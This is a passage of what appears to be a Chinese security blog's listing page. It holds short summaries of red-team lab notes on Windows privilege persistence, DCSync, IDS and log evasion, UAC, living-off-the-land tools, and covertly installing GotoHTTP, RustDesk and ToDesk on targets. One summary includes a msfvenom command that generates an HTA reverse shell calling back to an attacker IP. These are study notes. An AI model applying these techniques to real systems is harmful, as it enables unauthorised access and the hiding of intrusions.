摘要:
篡改无权限账户 无权限用户不会像管理员哪有受到太多监控,并以某种方式授予它们某种管理权限。 分配组成员 前提条件:获得了一个无权限或低权限的未授权账户 管理员组 让未授权用户获得管理员权限的直接方法是将其添加到管理员组。可以通过以下命令轻松实现: net localgroup administrat 阅读全文
posted @ 2025-12-04 16:26
shinianyunyan
阅读(127)
评论(0)
推荐(0)
摘要:
前言 权限最高的账户或组并不总是最适合用于持久化的,特权组比其他组受到更严格的监控,任何被归类为受保护组的组,如域管理员或企业管理员,都会受到额外的安全审查。 网络拓扑 与 thm 相关的示例/实验都使用的下面这个网络拓扑: 利用 DC Sync 持久化 概念&原理 DCSync 工作流程 发现与请 阅读全文
posted @ 2025-12-04 16:25
shinianyunyan
阅读(67)
评论(0)
推荐(0)
摘要:
检测方法 每个IPS/IDS都有特定的检测规则,通过规则进行监控流量,比如snort的规则包含以下信息: 动作:动作示例包括 警报 、记录、通过、丢弃和 拒绝 。 协议:TCP、UDP、ICMP 或 IP。 源 IP/源端口:!10.10.0.0/16 any 指的是不属于类 B 子网 10.10. 阅读全文
posted @ 2025-12-04 16:25
shinianyunyan
阅读(127)
评论(0)
推荐(0)
摘要:
UAC原理 UAC设置 根据用户的安全需求,UAC 可以配置为四个不同的通知级别: 始终通知: 在更改 Windows 设置或程序尝试安装应用程序或更改计算机时通知并提示用户进行授权。 仅在程序尝试更改我的计算机时通知我: 在程序尝试安装应用程序或更改计算机时通知并提示用户进行授权。管理员在更改 W 阅读全文
posted @ 2025-12-04 16:25
shinianyunyan
阅读(180)
评论(0)
推荐(0)
摘要:
前置基础 虽然很容易想到直接删除日志来规避日志记录,但一般现代环境中日志会启用日志转发,将日志转发到其他设备进行保护,就算是在转发前将日志删除了,也不能规避被发现,首先没有日志就很可疑,然后篡改/删除日志也有对应的日志记录: 事件 ID 目的 1102 Windows 安全审计日志被清除时的日志 1 阅读全文
posted @ 2025-12-04 16:25
shinianyunyan
阅读(123)
评论(0)
推荐(0)
摘要:
HTA 法一:通过投送payload,反弹shell 使用msfvenom生成payload: user@machine$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=443 -f hta-psh -o thm. 阅读全文
posted @ 2025-12-04 16:25
shinianyunyan
阅读(52)
评论(0)
推荐(0)
摘要:
基本思想 “就地取材”、“本地化存活”是一个有效规避检测的方法,通过利用win自带、由微软签发的的工具、命令、脚本等进行攻击利用能使攻击更加隐蔽,不易发现,常用的工具集如下: Windows Sysinternals 工具集:包含多个类别,包括:磁盘管理、进程管理、网络工具、系统信息、安全工具;访问 阅读全文
posted @ 2025-12-04 16:25
shinianyunyan
阅读(70)
评论(0)
推荐(0)
摘要:
GoToHTTP使用 使用cs或者其他工具将文件上传到目标机器 运行该文件 shell GotoHTTP_x64.exe 在运行目录下会生成一个配置文件: 查看配置文件里面有连接地址和账号密码: shell type gotohttp.ini 使用网页连接 成功控制目标机器 阅读全文
posted @ 2025-12-04 16:25
shinianyunyan
阅读(46)
评论(0)
推荐(0)
摘要:
安装RustDESK 通过cs上传到目标机器 运行程序 找到配置文件 shell type C:\Users\用户名\AppData\Roaming\RustDesk\config\RustDesk.toml 可以看到没有密码,这个时候需要手写这个密码,然后重启工具; 将这段内容复制下来,然后再本地 阅读全文
posted @ 2025-12-04 16:24
shinianyunyan
阅读(89)
评论(0)
推荐(0)
摘要:
软件安装 与向日葵不同,这个不需要修改注册表项,在命令行使用 /S 参数即可静默安装,没有UAC。 PS:但至少需要管理员才能没有UAC,如果是普通用户依然会显示UAC ToDesk1.exe /S 配置文件修改 todesk的密码没有办法通过解码得到明文,但可以找到目标主机ToDesk中的temp 阅读全文
posted @ 2025-12-04 16:24
shinianyunyan
阅读(117)
评论(0)
推荐(0)
浙公网安备 33010602011771号